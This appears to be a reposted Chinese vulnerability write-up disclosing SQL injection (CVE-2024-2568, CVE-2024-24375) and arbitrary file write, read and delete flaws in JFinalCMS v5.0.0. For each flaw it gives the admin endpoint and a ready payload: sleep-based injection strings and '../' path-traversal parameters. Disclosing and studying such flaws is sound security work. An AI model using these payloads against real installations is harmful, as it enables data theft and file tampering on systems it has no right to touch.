JFinalCMS v5.0.0存在多种类型漏洞
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请联系。
点击抽奖:揭秘内网安全:红队如何玩转渗透测试?文末抽奖,不用转发~
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
漏洞详情
JFinalCMS,极速开发,动态添加字段,自定义标签,动态创建数据库表并crud数据,数据库备份、还原,动态添加站点(多站点功能),一键生成模板代码,让您轻松打造自己的独立网站,同时也方便二次开发,让您快速搭建个性化独立网站,为您节约更多时间,去陪恋人、家人和朋友的一套个人java开发的信息咨询网站
JFinalCMS v5.0.0存在sql、任意文件写入、任意文件删除、任意文件读取多种漏洞。
源码地址
https://gitee.com/heyewei/JFinalcms版本
JFinalCMS v5.0.0
漏洞代码存在位置
/admin/div_data/delete?divId=9 #sql/admin/admin #sql/admin/template/save #任意文件写入/admin/template/delete #任意文件删除/admin/template/edit #任意文件读取
漏洞分析
0x01 JFinalCMS Custom Data Page SQL注入 CVE-2024-2568
自定义数据表存在SQL注入,地址为/admin/div_data/delete?divId=9
该函数Custom Data Page位于扩展内容 - 自定义数据中
payload:
cms_admin where id =20 or sleep(3) #
然后获取相应的数据包
sql延时
0x02 JFinalCMS /admin/admin nameSQL注入 CVE-2024-24375
/admin/admin 界面中存在一个 SQL 注入漏洞,JFinalcms 中存在一个通过 /admin/admin name 参数注入的 SQL 漏洞,该漏洞可以从前端直接串联成 SQL 语句。
AdminControl模块在收到name参数后传递给findPage函数,没有任何字符串过滤,这导致生成sql注入:
payload
name=' AND (SELECT 2522 FROM (SELECT(SLEEP(5)))qFTY) AND 'wguW'='wguW
从下图可看出,数据库中存储的敏感用户信息可以通过sqlmap获取到:
0x03 JFinalCMS 任意文件写入
JFinalcms v5.0.0在/admin/template/save中存在任意文件写入漏洞
选择新增模板并输入任何内容
修改数据包并写入任意指定路径
payloaddirectory=default&fileName=../../../../../key.txt&content=123456
同样成功写进文件
0x04 JFinalCMS 任意文件读取
JFinalcms v5.0.0 在 /admin/template/edit 中存在任意文件读取漏洞
在模版管理处点击编辑并抓包
修改数据包并写入指定路径
payload
/admin/template/edit?fileName=../../../../../key.txt&directory=default
0x05 JFinalCMS 任意文件删除
JFinalcms v5.0.0 在 /admin/template/delete 中存在任意文件删除漏洞
同样在模块管理中点击任意删除并抓包
修改数据包并写入指定路径
payload
/admin/template/delete?fileName=../../../../../key.txt&directory=default
作者:bigbigbigbaby作者:RiverGone
原文始发于微信公众号(不秃头的安全):漏洞挖掘 | JFinalCMS v5.0.0存在多种类型漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论